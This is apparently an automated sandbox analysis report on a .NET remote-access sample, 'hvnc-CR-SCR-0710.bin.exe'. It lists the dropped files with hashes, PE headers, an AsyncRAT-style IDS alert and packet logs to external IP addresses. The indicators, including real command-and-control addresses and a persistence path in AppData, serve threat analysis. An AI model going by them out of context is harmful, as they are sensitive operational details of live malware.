SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.144086598890895
Encrypted:	false
SSDEEP:	6:kKJA1L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:CiDnLNkPlE99SNxAhUe/3
MD5:	63F85C044010DCC4BC5081CADFEF425D
SHA1:	A3E10C39F48A04D68FB9B9A21D7B25990AA8EEFE
SHA-256:	30D1A346570D1FE85096BF65F748613DDA62B174F537B28E5DD6717D0E009A5B
SHA-512:	A2D7CCF334495D4361DF995878A99FBC8922F373FA0910E016FB01AE46CB5AAC0A74B08257B67F66C44913854A7304F21220B8AFDFFC761D12F653CF32BE3318
Malicious:	false
Reputation:	low
Preview:	p...... ..........%.....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1400
Entropy (8bit):	5.344873306377427
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhRAE4KzetfE4KnKIE4oKNzKo9E4KhZsXE4qdKm:MxHKlYHKh3oRAHKzetfHKntHo6lHKmHA
MD5:	8255A4767725CC323842B221CEAFCBEE
SHA1:	537C8C5384748F137B339E39BC0A7FA90DBBC112
SHA-256:	7B368AA23DA44F0789862A83A2FA7BD40B1E1FB3C19E69005FAEA382DD0252F5
SHA-512:	C9B2DB6E3059872EEBF2DDBF2CE19A76D794C01D50E6A178108F5DAF29BA3B93DCF048C72A4414FAB83026BBE062C6DB5BA91657EF4706853A26980342E2CDD8
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=n

C:\Users\user\AppData\Roaming\msql2.exe

Download File

Process:	C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1489920
Entropy (8bit):	5.316290527892678
Encrypted:	false
SSDEEP:	12288:JXIhNyKZGjweOYNA7hGisnA5nKmmrwJq/xn5Jqu5Iaqs7a0Kgy+Y+ePHASw:wjZYwDdhxsnuUwYL5Iaqs7Ty+nePHAS
MD5:	177136A947A8677C09FC4C9891B18DDE
SHA1:	CC5DBBAA959A97603E6A647E25F7DE47777CC6C3
SHA-256:	ADBCA36FA3DAB9CBC2BA34E3343C2CB6726EA5EF0064B293A01A1F396A454264
SHA-512:	38E42487E28D3405273797EDC24EF2C3068252E21DDC1FF188EFBC9628D816A1532E515EDC5FE0921D6185315344E0ACC091797995430ED646D8F00D0B354E91
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26% Antivirus: Virustotal, Detection: 34%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....t.g................................. ........@.. ....................... ............`.................................p...K.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........8...............................................................(.......(.....(....(.....0.......... ........8........E....V...........W...8Q......(....9K... ....8....(....(....(....r...p(...... ....~....{....:....& ....8....s....z.....(......rM..p(......... ....~....{+...9_...& ....8T......0..T....... ........8........E....4.......8/...~....(...+(....& ....~....{....:....& ....8....:........o.....:........o.....>.........(..........(....N.............(.

C:\Users\user\AppData\Roaming\msql2.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.316290527892678
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	hvnc-CR-SCR-0710.bin.exe
File size:	1'489'920 bytes
MD5:	177136a947a8677c09fc4c9891b18dde
SHA1:	cc5dbbaa959a97603e6a647e25f7de47777cc6c3
SHA256:	adbca36fa3dab9cbc2ba34e3343c2cb6726ea5ef0064b293a01a1f396a454264
SHA512:	38e42487e28d3405273797edc24ef2c3068252e21ddc1ff188efbc9628d816a1532e515edc5fe0921d6185315344e0acc091797995430ed646d8f00d0b354e91
SSDEEP:	12288:JXIhNyKZGjweOYNA7hGisnA5nKmmrwJq/xn5Jqu5Iaqs7a0Kgy+Y+ePHASw:wjZYwDdhxsnuUwYL5Iaqs7Ty+nePHAS
TLSH:	C865728BBADB48B1F1B62775C9BB08284771FD917633FA1E310A134A05137659B88F27
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....t.g................................. ........@.. ....................... ............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x56d1be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x670374A7 [Mon Oct 7 05:41:59 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x16d170	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16e000	0x5e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x170000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x16b1c4	0x16b200	a0a89f00e885820646704e6ec64a9a5d	False	0.3468555023666093	data	5.318382028130806	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x16e000	0x5e8	0x600	9b8deb9b5d58e832d676563863e6d53f	False	0.4264322916666667	data	4.223192434886695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x170000	0xc	0x200	454d925c58bf15528c83928aae3adf23	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x16e0a0	0x35c	data			0.40930232558139534
RT_MANIFEST	0x16e3fc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-13T18:15:10.553784+0200	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	31.41.244.211	56001	192.168.2.4	49732	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 18:14:59.566941023 CEST	49730	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:14:59.567004919 CEST	443	49730	185.166.143.49	192.168.2.4
Oct 13, 2024 18:14:59.567131042 CEST	49730	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:14:59.578809023 CEST	49730	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:14:59.578845024 CEST	443	49730	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:00.322622061 CEST	443	49730	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:00.322751999 CEST	49730	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:00.325928926 CEST	49730	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:00.325958967 CEST	443	49730	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:00.326186895 CEST	443	49730	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:00.372591972 CEST	49730	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:00.419440031 CEST	443	49730	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:00.789896011 CEST	443	49730	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:00.789913893 CEST	443	49730	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:00.789956093 CEST	443	49730	185.166.143.49	192.168.2.4
Oct 13, 2024 18:15:00.790005922 CEST	49730	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:00.790071964 CEST	49730	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:00.797945023 CEST	49730	443	192.168.2.4	185.166.143.49
Oct 13, 2024 18:15:00.822808027 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:00.822896004 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:00.823000908 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:00.823266029 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:00.823303938 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.411732912 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.411998034 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.414411068 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.414464951 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.414748907 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.416126013 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.463423014 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.559624910 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.561533928 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.561547041 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.561738014 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.561803102 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.562047005 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.653250933 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.653268099 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.653456926 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.653520107 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.653809071 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.653870106 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.655517101 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.655534983 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.655594110 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.655699015 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.655699015 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.655699015 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.655769110 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.706274033 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.745186090 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.745212078 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.745234966 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.745452881 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.745526075 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.745564938 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.746653080 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.746676922 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.746738911 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.746762991 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.746790886 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.747860909 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.747875929 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.747941017 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.747957945 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.748863935 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.748904943 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.748930931 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.748944998 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.748977900 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.799915075 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.838028908 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.838044882 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.838078022 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.838227034 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.838227034 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.838296890 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.838521004 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.838537931 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.838584900 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.838608980 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.838639021 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.839298964 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.839338064 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.839371920 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.839380980 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.839404106 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.839428902 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.839472055 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.839977026 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.840006113 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.840046883 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.840061903 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.840111017 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.840349913 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.840413094 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.840426922 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.841475010 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.841486931 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.841571093 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.841586113 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.842199087 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.842211008 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.842272997 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.842289925 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.843055964 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.843071938 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.843130112 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.843151093 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:01.843182087 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:01.893841028 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.106657982 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.106724977 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.106834888 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.106870890 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.106894016 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.106967926 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.107007980 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.107007980 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.107620955 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.107639074 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.107701063 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.107718945 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.107748985 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.108630896 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.108644962 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.108714104 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.108730078 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.109081030 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.109097004 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.109127998 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.109144926 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.109159946 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.109191895 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.112715960 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.112747908 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.112786055 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.112801075 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.112857103 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.113404036 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.113419056 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.113444090 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.113483906 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.113497972 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.113523960 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.114121914 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.114137888 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.114187002 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.114202023 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.114229918 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.114828110 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.114840984 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.114871979 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.114923954 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.114939928 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.114964962 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.115286112 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.115319014 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.115355968 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.115370035 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.115422010 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.116106033 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.116122961 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.116141081 CEST	443	49731	3.5.30.95	192.168.2.4
Oct 13, 2024 18:15:02.116187096 CEST	49731	443	192.168.2.4	3.5.30.95
Oct 13, 2024 18:15:02.116200924 CEST	443	49731	3.5.30.95	192.168.2.4
